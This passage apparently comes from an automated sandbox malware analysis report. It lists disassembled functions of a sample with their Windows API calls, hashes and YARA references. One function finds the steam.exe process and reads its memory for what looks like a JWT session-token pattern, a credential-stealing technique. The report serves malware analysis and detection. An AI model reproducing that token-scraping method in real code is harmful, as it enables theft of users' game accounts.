                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                          Function 00411D20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                                          • String ID: %hs
                                                                                                                                                                                                                                                                          • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                                          • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                          • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                          Function 00410050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00411ED0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                            • Part of subcall function 00411ED0: Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                            • Part of subcall function 00411ED0: Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                            • Part of subcall function 0040FD50: ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0040FD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040FD50: OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD94
                                                                                                                                                                                                                                                                            • Part of subcall function 0040FD50: memset.MSVCRT ref: 0040FDB3
                                                                                                                                                                                                                                                                            • Part of subcall function 0040FD50: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040FDF1
                                                                                                                                                                                                                                                                            • Part of subcall function 0040FD50: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000208,00000000,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73,-00000208,?,FFFFFFFF,00000FFF,?,?), ref: 0040FE56
                                                                                                                                                                                                                                                                            • Part of subcall function 0040FD50: strlen.MSVCRT ref: 0040FE67
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(?,?,00000000,steam.exe), ref: 00410070
                                                                                                                                                                                                                                                                          • strcpy.MSVCRT(00000000,?,steam.exe), ref: 00410089
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,steam.exe), ref: 004100BF
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,steam.exe), ref: 004100D1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??3@ProcessProcess32$CreateFirstMemoryNextOpenReadSnapshotToolhelp32_invalid_parameter_noinfo_noreturnmemsetstrcpystrlen
                                                                                                                                                                                                                                                                          • String ID: steam.exe
                                                                                                                                                                                                                                                                          • API String ID: 3498801153-2826358650
                                                                                                                                                                                                                                                                          • Opcode ID: a2f9b2e369386f85e83ddeaa877c3ddd3aa875f1337813b5b8a957473dbf5942
                                                                                                                                                                                                                                                                          • Instruction ID: c95efb34c5d0572b28db4c51e5027ad35194888a113b08cfb57a14cf0263e5e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2f9b2e369386f85e83ddeaa877c3ddd3aa875f1337813b5b8a957473dbf5942
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4F0F9B1A003082BEA10753A7CC5AFB7948DA55758F040537FD5597342F59B8CD402BA
                                                                                                                                                                                                                                                                          Function 0041D710 Relevance: 6.1, APIs: 4, Instructions: 82timeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041D784
                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D78E
                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D7A9
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D80E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 568878067-0
                                                                                                                                                                                                                                                                          • Opcode ID: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                          • Instruction ID: 931dc2256524a03f6c6b52008fe1b6fe3cfd9aca74429015198684bf78445e10
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75b2103738ecdde49953f6b06e7d75b5bbde3c112b22eec6627f6643067b6ab9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0318BB2904B109AE329CF29C8547B7BBE4FF84340F008A2EF5D69A250E779E485DB55
                                                                                                                                                                                                                                                                          Function 0041D850 Relevance: 6.1, APIs: 4, Instructions: 71timeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 568878067-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                          • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                          Function 00412C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                                                                                                          • API String ID: 3330995566-2343686810
                                                                                                                                                                                                                                                                          • Opcode ID: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                          • Instruction ID: 7cbb43b9c3c311997e94ccc4c59da73614e136a49788afc63ea09a6e546b0ca8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2c58b9c6c1bfbc32daa91625234a30c7c08b101eb4f4c09a5ba0343b8f98f7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F721D7741403099BD734DB21ED44BAB7365FB80308F04891ED91647741E77DE9AAC6A5
                                                                                                                                                                                                                                                                          Function 0041EAFB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041EB07
                                                                                                                                                                                                                                                                            • Part of subcall function 0041EB72: std::exception::exception.LIBCONCRT ref: 0041EB7F
                                                                                                                                                                                                                                                                            • Part of subcall function 0041EC3E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0041EAFA,?,00422154,?), ref: 0041EC9E
                                                                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 0041EB24
                                                                                                                                                                                                                                                                            • Part of subcall function 0041EA14: ___std_exception_copy.LIBVCRUNTIME ref: 0041EA32
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::exception::exception$ExceptionRaise___std_exception_copystd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: MA
                                                                                                                                                                                                                                                                          • API String ID: 2169675119-1995383381
                                                                                                                                                                                                                                                                          • Opcode ID: 5e16bcba1fca8ba3076d95534cb6dda54aad2f4c5bdff137491fbfa41facd8a7
                                                                                                                                                                                                                                                                          • Instruction ID: aceb0b94333c3644e7339e40653adef569b9cd35f7f4b7ecff5777f99ee5ba9c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e16bcba1fca8ba3076d95534cb6dda54aad2f4c5bdff137491fbfa41facd8a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABE0E67590421C778B10BAA6E805CC9BB6C9A00750B404426BE4496541D7B5A99487D9